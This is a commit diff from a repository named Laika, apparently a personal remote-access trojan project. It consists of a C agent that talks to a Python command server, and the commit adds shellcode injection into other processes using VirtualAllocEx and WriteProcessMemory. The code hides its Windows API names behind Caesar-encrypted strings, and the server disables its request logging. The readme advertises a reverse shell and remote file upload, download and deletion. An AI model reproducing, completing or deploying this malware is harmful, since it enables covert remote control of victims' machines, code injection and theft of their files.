patate/Laika
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

début de shellcode injection, readme update

Browse Source
This commit is contained in:
ALittlePatate
2023-03-16 08:44:10 +01:00
parent 6e5eb69bfc
commit d1ea71557d
6 changed files with 69 additions and 43 deletions
Download Patch File Download Diff File Expand all files Collapse all files

88
Laika/main.c
View File

@@ -287,9 +287,9 @@ retry:
} }
if (Api.strncmp(server_reply, "nsojhy", strlen("nsojhy")) == 0) { //inject if (Api.strncmp(server_reply, "nsojhy", strlen("nsojhy")) == 0) { //inject
char* arch = (char*)Api.malloc(3); char* arch = (char*)Api.malloc(2);
if (Api.recv(sock, arch, 3, 0) <= 0) { if (Api.recv(sock, arch, 2, 0) <= 0) {
//send failed //send failed
Api.free(arch); Api.free(arch);
Sleep_(Sleep_TIME); Sleep_(Sleep_TIME);
@@ -297,57 +297,75 @@ retry:
} }
CAESAR_DECRYPT(arch); CAESAR_DECRYPT(arch);
// Create a file handle for the memory buffer HANDLE hFile = CreateFileMappingW(
HANDLE hFile = Api.CreateFileW( INVALID_HANDLE_VALUE, // Use the page file
L"ykifyk", NULL, // Default security attributes
GENERIC_READ | GENERIC_WRITE, PAGE_READWRITE, // Read/write access
FILE_SHARE_READ | FILE_SHARE_WRITE, 0, // Map the entire file
NULL, BUFFER_SIZE, // Size of the file (in bytes)
CREATE_ALWAYS, TEXT("idufhiu")); // Name of the file mapping object
FILE_ATTRIBUTE_NORMAL,
NULL);
upload_file(sock, hFile); if (hFile == NULL) {
Api.free(arch);
// Open the file handle for reading
hFile = Api.CreateFileW(
L"ykifyk",
GENERIC_READ,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (hFile == INVALID_HANDLE_VALUE) {
Sleep_(Sleep_TIME); Sleep_(Sleep_TIME);
goto retry; goto retry;
} }
char* buffer = (char*)Api.malloc(BUFFER_SIZE); upload_file(sock, hFile);
Api.ReadFile(hFile, buffer, BUFFER_SIZE, NULL, NULL);
Api.CloseHandle(hFile); // Move the file pointer back to the beginning of the file
Api.SetFilePointer(hFile, 0, NULL, FILE_BEGIN);
HANDLE proc; HANDLE proc;
if (Api.strncmp(arch, "x86", strlen("x86")) == 0) { if (Api.strncmp(arch, "32", strlen("32")) == 0) {
proc = FindProcessByArch(L"x86"); proc = Api.OpenProcess(PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION, FALSE, (DWORD)18872);//FindProcessByArch(L"x86");
} }
else { else {
proc = FindProcessByArch(L"x64"); proc = FindProcessByArch(L"x64");
} }
if (proc == NULL) {
Api.free(arch); Api.free(arch);
Api.free(buffer);
if (proc == NULL) {
Api.CloseHandle(hFile);
Sleep_(Sleep_TIME); Sleep_(Sleep_TIME);
goto retry; goto retry;
} }
//Api.WriteProcessMemory(proc, (LPVOID)0, "", 0, NULL); WIP // Get the size of the file
LARGE_INTEGER fileSize;
if (!Api.GetFileSizeEx(hFile, &fileSize))
{
Api.CloseHandle(hFile);
Api.CloseHandle(proc);
Sleep_(Sleep_TIME);
goto retry;
}
LPVOID addr = Api.VirtualAllocEx(proc, NULL, (size_t)fileSize.QuadPart, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (addr == NULL) {
Api.CloseHandle(hFile);
Api.CloseHandle(proc);
Sleep_(Sleep_TIME);
goto retry;
}
DWORD bytesRead;
char* shellcode = (char*)Api.malloc((size_t)fileSize.QuadPart);
if (!Api.ReadFile(hFile, shellcode, sizeof(shellcode), &bytesRead, NULL))
{
Api.free(shellcode);
Api.CloseHandle(hFile);
Api.CloseHandle(proc);
Sleep_(Sleep_TIME);
goto retry;
}
Api.WriteProcessMemory(proc, addr, shellcode, BUFFER_SIZE, NULL);
Api.free(shellcode);
Api.CloseHandle(hFile);
Api.CloseHandle(proc); Api.CloseHandle(proc);
Api.free(arch);
Api.free(buffer);
} }
if (Api.strncmp(server_reply, "ljydknqjdqnxy", strlen("ljydknqjdqnxy")) == 0) { //get_file_list if (Api.strncmp(server_reply, "ljydknqjdqnxy", strlen("ljydknqjdqnxy")) == 0) { //get_file_list

3
Laika/resolve_apis.c
View File

@@ -41,6 +41,9 @@ void InitApis() {
Api.Process32NextW = (TProcess32NextW)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("Uwthjxx87Sj}y\\")); Api.Process32NextW = (TProcess32NextW)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("Uwthjxx87Sj}y\\"));
Api.IsWow64Process = (TIsWow64Process)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("Nx\\t|;9Uwthjxx")); Api.IsWow64Process = (TIsWow64Process)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("Nx\\t|;9Uwthjxx"));
Api.WriteProcessMemory = (TWriteProcessMemory)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("\\wnyjUwthjxxRjrtw~")); Api.WriteProcessMemory = (TWriteProcessMemory)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("\\wnyjUwthjxxRjrtw~"));
Api.VirtualAllocEx = (TVirtualAllocEx)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("[nwyzfqFqqthJ}"));
Api.SetFilePointer = (TSetFilePointer)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("XjyKnqjUtnsyjw"));
Api.GetFileSizeEx = (TGetFileSizeEx)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("LjyKnqjXn\x7fjJ}")); //GetFileSieEx
hMsvcrt = LoadLibraryA(CAESAR_DECRYPT("rx{hwy3iqq")); hMsvcrt = LoadLibraryA(CAESAR_DECRYPT("rx{hwy3iqq"));
if (!hMsvcrt) { if (!hMsvcrt) {

6
Laika/resolve_apis.h
View File

@@ -69,6 +69,9 @@ typedef HANDLE(WINAPI* TOpenProcess)(DWORD, BOOL, DWORD);
typedef BOOL(WINAPI* TProcess32NextW)(HANDLE, LPPROCESSENTRY32W); typedef BOOL(WINAPI* TProcess32NextW)(HANDLE, LPPROCESSENTRY32W);
typedef BOOL(WINAPI* TIsWow64Process)(HANDLE, PBOOL); typedef BOOL(WINAPI* TIsWow64Process)(HANDLE, PBOOL);
typedef BOOL(WINAPI* TWriteProcessMemory)(HANDLE, LPVOID, LPCVOID, SIZE_T, SIZE_T*); typedef BOOL(WINAPI* TWriteProcessMemory)(HANDLE, LPVOID, LPCVOID, SIZE_T, SIZE_T*);
typedef LPVOID(WINAPI* TVirtualAllocEx)(HANDLE, LPVOID, SIZE_T, DWORD, DWORD);
typedef DWORD(WINAPI* TSetFilePointer)(HANDLE, LONG, PLONG, DWORD);
typedef BOOL(WINAPI* TGetFileSizeEx)(HANDLE, PLARGE_INTEGER);
typedef struct ApiList { typedef struct ApiList {
Tconnect connect; Tconnect connect;
@@ -115,6 +118,9 @@ typedef struct ApiList {
TProcess32NextW Process32NextW; TProcess32NextW Process32NextW;
TIsWow64Process IsWow64Process; TIsWow64Process IsWow64Process;
TWriteProcessMemory WriteProcessMemory; TWriteProcessMemory WriteProcessMemory;
TVirtualAllocEx VirtualAllocEx;
TSetFilePointer SetFilePointer;
TGetFileSizeEx GetFileSizeEx;
Tmbstowcs mbstowcs; Tmbstowcs mbstowcs;
Twcstombs wcstombs; Twcstombs wcstombs;

2
Laika/shellcode.c
View File

@@ -23,7 +23,7 @@ HANDLE FindProcessByArch(const wchar_t* arch)
HANDLE hProcess; HANDLE hProcess;
BOOL isWow64; BOOL isWow64;
hProcess = Api.OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID); hProcess = Api.OpenProcess(PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION, FALSE, pe32.th32ProcessID);
if (hProcess == NULL) { if (hProcess == NULL) {
continue; continue;
} }

9
Server/Server.py
View File

@@ -145,8 +145,8 @@ def upload_file(fp, sock):
app = Flask(__name__) app = Flask(__name__)
# Disable Flask's default logging # Disable Flask's default logging
#log = logging.getLogger('werkzeug') log = logging.getLogger('werkzeug')
#log.disabled = True log.disabled = True
@app.route('/<path:filename>') @app.route('/<path:filename>')
def serve_file(filename): def serve_file(filename):
@@ -559,10 +559,7 @@ def main() -> None :
continue continue
client.send(CAESAR("inject").encode()) client.send(CAESAR("inject").encode())
if arch == "32" : client.send(CAESAR(arch).encode())
client.send(CAESAR("x86").encode())
else :
client.send(CAESAR("x64").encode())
fp = open(fichier, "rb") fp = open(fichier, "rb")
upload_file(fp, client) upload_file(fp, client)

6
readme.md
View File

@@ -1,14 +1,16 @@
# Laika # Laika
J'ai commencé un début de Shellcode injection mais j'ai un peu la flemme de continuer. Pour bien faire il faudrait créer un process "zombie" qui va recevoir les shellcodes à injecter (agents/features), et un watcher qui le relance s'il meurt.<br>
L'agent N'EST PAS plug and play, il manque certaines choses, de plus c'est un projet perso et c'est pas vraiment fait pour être utilisé.<br>
# Agent # Agent
## Features : ## Features :
* Reverse shell * Reverse shell
* File explorer (download/upload/remove) * File explorer (download/upload/remove)
* Shellcode injection (TODO)
## Caractéristiques ## Caractéristiques
* Petit (12ko) * Petit (14ko)
* Fait en C, sans CRT * Fait en C, sans CRT
* x32 bit * x32 bit
* Modulaire (peut se déployer via shellcode/dll/pe injection/.exe) * Modulaire (peut se déployer via shellcode/dll/pe injection/.exe)